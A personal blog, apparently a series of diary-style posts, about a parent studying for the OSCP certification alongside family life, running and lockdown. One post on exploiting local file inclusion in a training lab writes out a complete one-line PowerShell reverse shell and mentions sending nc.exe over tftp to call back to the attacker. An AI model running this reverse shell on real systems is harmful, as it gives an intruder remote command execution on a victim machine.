…and it’s April.

Yep, so I haven’t posted for a while.  Mainly because I have stuff to do and no one cares to read personal blog posts.  I most likely will keep things down to one or two personal posts a month.

So here’s #1 for April.  Yay!

So, what’s been going on?  Well, we are in the middle of the coronavirus lock-down so things have changed a bit.  We don’t venture too far from the house these days, eat in mostly, and spend a lot more time with the kiddos.

I have made it up to about 33 minutes of non-stop running, my 4 Miler got canceled, and now I am looking for motivation to keep running.  I think staying in shape and strong enough to not wear out quickly is enough motivation.

I am climbing the OSCP hill again with the new 2020 material.  No lab time yet – I am trying to get through the books first before I hit the labs.

Orthodox Easter was yesterday.  We had the couple that we are sharing a nanny with over and we did an Easter egg hunt for Mila and her friend, Diego.

Mila’s birthday is tomorrow.  I can’t believe she is going to be five.

That’s all I got for now.  Going to see if I can get a run in.  Still waking up early ftw!

That S*(&% hit me like a brick

Welp, my test date came, I logged in, got set up, saw what it was about, and was like – I need to really try harder here. I knew I wasn’t going to pass, and I didn’t even try. I was so not ready. With two kids, work, and little bits of studying, I wasn’t retaining the information and wasn’t going to pass. I did find out how the BoF is going to go down and the points on the test…. so that is good. But now, I need to reframe and think about how to do this.

I am on parental leave for 2 1/2 months. Which means I do not have work to worry about. I will need to take care of Andrew, but when he is sleeping, I can study. But I think approaching the OSCP is going to take a fundamental shift. I can’t just go through the labs and expect to break boxes, I need to go through the labs, explore the labs, and then break boxes. And take notes. Nuggets along the way, and also have a methodology down. It’s the only way. So I bought some notecards and thought I would break up the areas into six sections:

  1. Information Gathering
  2. Vulnerability Identification
  3. Research and Development
  4. Exploitation
  5. Post Exploitation

Information gathering will be netdiscover, nmap. Vulnerability Identification will be searching from the vulnerabilities. Research and Development will be setting up the vulnerability. Exploitation will be running the exploit, and post-exploitation will be priv escalation, etc.

Now, this might change as I pick up nuggets, but I think this is a good place to start. I have looked at a few, and I waffle with 2 & 3, whether they should be switched. Meh, I just need to start getting back into the journey.

I did a few Kioptrix boxes from Vulnhub, just to get a little footing, but I think starting tomorrow, I am going to re-signup for the labs and just do the studying all over again. I have to go deeper – study constantly. Try harder.

I started reading a book called “Deep Work” and it talks about how impactful work, the work you lock yourself into a room with, can bring change. For the next 90 days I am going to try harder. I really, REALLY want this cert. For me. I am not going to stop till I get it.

I need to commit more

This journey is slowing fading. I need really need to commit more on doing my OSCP studying. I decided to try to hook up with a tutor to get BoFs down, but I am slowly losing my knowledge on the other areas.

The idea of sticking to just doing BoFs is not working. I will work on them tonight, come up with some questions for my tutor, and then work on HTBs that are like the OSCP. I think that is the best approach at this point. And now, it’s off to work. I am going to get to work a bit early to see if I can leave early. And I am out. 🙂

Welcome, Andrew Hunter!

July 5, 2019 3:47 pm, 7 lbs, 13 oz.

Less than five days ago, this little dude entered into my life and my family. I am so blessed to be another father to a healthy kiddo. Words can’t describe how I feel now – this week I am off of work, just taking care of my amazing wife and newborn.

The second time around, I am not as worried about everything – I can just relax, and enjoy him. I have been studying – Mila is with my in-laws, giving me some time to be with the baby. So back to studying! (58 days left!)

Back to buffer overflows!

Oh man, it’s 69 days till the exam now?!?

My wife is due any day now with our next kiddo. I have a huge paper that I am editing. Then I need to start working on more work, then more work, then, wait, what about OSCP studying? Damn it. I am getting worried.

I am currently at Starbucks on a Friday night, away from my family TRYING to get through my paper. I feel like adulting is just getting through one hurdle just to get through the next one. Or maybe that’s just life. Whatever. My countdown clock that pops up when I open a new tab in chrome is just counting down the seconds till I bomb my OSCP if I don’t do something drastic.

Why are you looking at me like that BEAR!?!?!

And there goes the break timer. Back at it. Back at working. I still have a dream to get to my OSCP, but work really is doing a number at my studying time.

Hack The Box!

Hello, friend. So I have 8 days left in the PWK course. 2 hours/day is not realistic on the weekdays, so let’s go with 1 for now. It takes like 30 min to just get back into the material, so yeah.

I am going to spend the last few days here going through BoF. Today, I just reviewed nc and ncat. Basic stuff we are working with here people. But it’s been sometime I have worked with this stuff… even just grepping commands when working with enumeration… like not even pentesting.

Hack The Box, baby.

Anyway, I also got set up on HTB, and put my little sticker on the right for all to see. I am a noob!! Yay! Actually I rooted one active box today. Ridiculously simple to grab the flags, but it was a nice little win. I will be working on HTB to brush up skills post PWK. I also got a VIP because I can then go through retired machines and walk-throughs, etc.

As my wife always says to me, it’s not when you get your OSCP, is that you get your OSCP. I honestly hope I get it before I die. ugh.

RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am today to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.


…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of things that they say in the exercise is that they quote Lincoln – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. 🙂

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!

Day 53 of the OSCP!!

I am slow – like really slow. I got through the enumeration section of the book pretty steadily, but now that I am working on Buffer Overflows, things are going slow and I am not as “quick” to pick back up the book.

I wake up at 4 am every day eager to study. After checking emails and reddit, I get in and make a little bit of progress. I really have to start putting more of my heart into this or else this OSCP is going to drag…

People take the test, what, like three times before they pass? I really need to get more wrapped in it, or this is going to be a really long process. I think I am going to buy 90 more days of lab to finish out the book, and then just go nuts on studying through hackthebox.eu and vulnhub. Take the test at the latest I can take it, and then if I fail, maybe 30 more days of lab and studying and then take it again.

I have a baby boy due in July so, yeah…. life happens, but it has always been my passion to pass this cert. I got this. Wish me luck.